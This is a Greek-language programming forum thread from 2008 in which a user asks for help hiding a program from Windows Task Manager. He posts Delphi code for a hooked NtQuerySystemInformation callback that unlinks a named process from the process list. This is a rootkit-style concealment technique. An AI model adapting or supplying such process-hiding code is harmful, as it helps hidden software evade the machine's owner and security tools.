ntaryl Δημοσ. 23 Οκτωβρίου 2008 Δημοσ. 23 Οκτωβρίου 2008 καλησπερα Αυτο το διαστημα δουλευω σε ενα project στο οποιο χρησιμοποιω native(undocument) api . Συγκεκριμενα προσπαθω να φτιαξω ενα προγραμα να ειναι αορατο απο το task manager. Δουλευο σε επιπεδο Ring 3(user mode) Προσπαθω να δημιουργησω την callback function για την NtQuerysysteminformation αλλα δεν βγαζω ακρη Βρηκα καποια παραδειγματα σε Delphi αλλα χρειαζομαι convert . Δεν ξερω απο Delphi . Οποιος μπορει να βοηθησει ευχαριστω πολυ > function NtQuerySystemInformationcallback(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: PVOID; SystemInformationLength: ULONG; ReturnLength: PULONG): NTSTATUS; stdcall; var LastProcessInfo, ProcessInfo: PSYSTEM_PROCESSES; Offset: dword; begin Result := nowaNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); if Result <> 0 then Exit; if SystemInformationClass = SystemProcessesAndThreadsInformation then begin Offset := 0; LastProcessInfo := nil; repeat ProcessInfo := PSYSTEM_PROCESSES(pointer(dword(SystemInformation) + Offset)); if lowercase(ProcessInfo.ProcessName.Buffer)=lowercase(Proname) then // the name of the process is the same as our Proname begin if ProcessInfo.NextEntryDelta = 0 then begin if LastProcessInfo <> nil then LastProcessInfo.NextEntryDelta := 0; Exit; end else begin LastProcessInfo.NextEntryDelta := LastProcessInfo.NextEntryDelta + ProcessInfo.NextEntryDelta; end; end else begin LastProcessInfo := ProcessInfo; end; Offset := Offset + ProcessInfo.NextEntryDelta; until ProcessInfo.NextEntryDelta = 0; end; end; Υ.γ Το Structure το βρηκα ηδη ετοιμο σε Vbasic thanks
PavelX Δημοσ. 24 Οκτωβρίου 2008 Δημοσ. 24 Οκτωβρίου 2008 Πραγματικά κάνεις τα καλύτερα posts BY FAR. Μια διευκρίνιση όμως. Θέλεις να το κρύψεις από τα processes γενικά ή μόνο από το taskmanager;
ntaryl Δημοσ. 24 Οκτωβρίου 2008 Μέλος Δημοσ. 24 Οκτωβρίου 2008 καλησπερα Ευχαριστω πολυ για την απαντηση Το ζητουμενο ειναι να μπορει να περναει αορατη απο το task manager . Οταν καποισς πατησει Ctrl -Alt-del να μην βλεπει πουθενα την εγαρμογη. Φυσικα καποιος ψαγμενος θα μπορει να εντοπισει την συγκεκριμενη εφαρμογη . ευχαριστω και παλι
PavelX Δημοσ. 24 Οκτωβρίου 2008 Δημοσ. 24 Οκτωβρίου 2008 Μπορείς να ποστάρεις το structure που έχεις σε VB? Είτε με PM.
ntaryl Δημοσ. 24 Οκτωβρίου 2008 Μέλος Δημοσ. 24 Οκτωβρίου 2008 Oκ Φιλε θα προτιμουσα να ερθεισ στο msn βεβαια
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.